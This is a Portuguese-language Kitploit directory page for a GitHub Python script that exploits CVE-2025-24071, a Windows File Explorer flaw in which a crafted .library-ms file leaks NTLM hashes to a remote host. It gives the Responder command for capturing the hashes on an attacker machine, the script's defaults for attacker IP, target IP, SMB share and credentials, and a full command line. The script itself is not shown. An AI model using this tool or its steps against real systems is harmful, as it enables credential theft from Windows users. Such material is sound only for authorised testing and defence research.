Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/ac8999/cve-2025-24071
Quebra de SenhasAnálise de VulnerabilidadesExploraçãoColeta de InformaçõesTestes de PenetraçãoRed Teaming
GitHubac8999/cve-2025-24071

CVE-2025-24071

Script Python para executar CVE-2025-24071

Ver Repositório
14há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-24071: Vulnerabilidade de Spoofing do Explorador de Arquivos do Microsoft Windows (script por SilentExploit)

📖 Descrição

Este projeto detecta e demonstra a exploração de uma vulnerabilidade de spoofing do Explorador de Arquivos do Windows.

O problema surge de um arquivo de biblioteca do Windows (.library-ms) contendo um caminho de rede, seja como anexo direto ou incorporado em um arquivo.
Quando aberto, o arquivo pode fazer com que o Windows vaze hashes NTLM para um local de rede remoto (potencialmente malicioso).

POC: https://imgur.com/a/hEO83Se

⚡ Uso

1. Iniciar o Responder

Na sua máquina atacante, execute o Responder para capturar hashes NTLM:

root@kitploit:~
sudo responder -I tun0 -wvF

2. Executar o Script

Você pode configurar o script de duas maneiras:

✅ Opção A: Editar padrões (mais fácil)

Modifique os parâmetros padrão diretamente no script.

root@kitploit:~
    parser.add_argument("--attacker-ip", default="10.10.14.14", help="Attacker's IP")      #your IP
    parser.add_argument("--target-ip", default="10.129.232.88", help="Target's IP")         #target IP 
    parser.add_argument("--share-name", default="IT", help="SMB share name")               #name of the share you have access to without the /
    parser.add_argument("--username", default="USERNAME", help="SMB username")          #username  of the share owner 
    parser.add_argument("--password", default="PASSWORD", help="SMB password")        #password of the share owner 
    parser.add_argument("--interface", default="tun0", help="Responder network interface")        #check ifconfig but tun0 will work if you're on a vpn
    return parser.parse_args()

✅ Opção B: Executar com parâmetros de linha de comando

Execute com argumentos:

root@kitploit:~
python3 CVE-2025-24071.py \
    --attacker-ip <ATTACKER_IP> \
    --target-ip <TARGET_IP> \
    --share-name <SHARE_NAME> \
    --username <USERNAME> \
    --password <PASSWORD> \
    --interface <INTERFACE>
Baixar ferramenta